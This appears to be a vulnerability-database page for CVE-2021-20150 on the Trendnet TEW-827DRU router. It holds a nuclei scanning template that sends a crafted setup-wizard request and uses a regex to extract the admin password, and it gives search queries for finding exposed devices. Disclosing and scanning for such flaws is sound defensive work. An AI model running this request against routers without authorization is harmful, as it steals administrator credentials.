Lucene search
K

Trendnet AC2600 TEW-827DRU - Credentials Disclosure

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

Trendnet AC2600 TEW-827DRU version 2.08B01 setup wizard improperly redirects, leading to credentials disclosure

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-20150
27 Apr 202309:58
circl
CNNVD
Trendnet AC2600 访问控制错误漏洞
30 Dec 202100:00
cnnvd
CNVD
Trendnet AC2600 TEW-827DRU Licensing Issue Vulnerability
3 Jan 202200:00
cnvd
CVE
CVE-2021-20150
30 Dec 202121:31
cve
Cvelist
CVE-2021-20150
30 Dec 202121:31
cvelist
Nuclei
Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
2 Jul 202609:36
nuclei
NVD
CVE-2021-20150
30 Dec 202122:15
nvd
OSV
CVE-2021-20150
30 Dec 202122:15
osv
Prion
Authentication flaw
30 Dec 202122:15
prion
RedhatCVE
CVE-2021-20150
22 May 202519:06
redhatcve
Rows per page
id: CVE-2021-20150

info:
  name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
  author: gy741
  severity: medium
  description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
  impact: |
    An attacker can obtain sensitive credentials, leading to unauthorized access to the router.
  remediation: |
    Update the router firmware to the latest version to fix the vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2021-54
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20150
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-20150
    cwe-id: CWE-306
    epss-score: 0.4006
    epss-percentile: 0.98453
    cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: trendnet
    product: tew-827dru_firmware
    shodan-query:
      - http.html:"TEW-827DRU"
      - http.html:"tew-827dru"
    fofa-query: body="tew-827dru"
  tags: cve2021,cve,disclosure,router,tenable,trendnet,vuln

http:
  - raw:
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}

        action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ftp_username'
          - 'ftp_password'
          - 'ftp_permission'
          - 'TEW-827DRU'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: password
        group: 1
        regex:
          - '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'
        part: body
# digest: 4b0a0048304602210084d7c89a02e411b3a7e2837872c3cea9a74fee848a7b0468d43ceaca5647872a0221008d2509d5647c07ccd43d85fba7a053e8b7a2eaf2058dc9944e5f7a6a9be058aa:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 25
CVSS 3.15.3
EPSS0.4006
26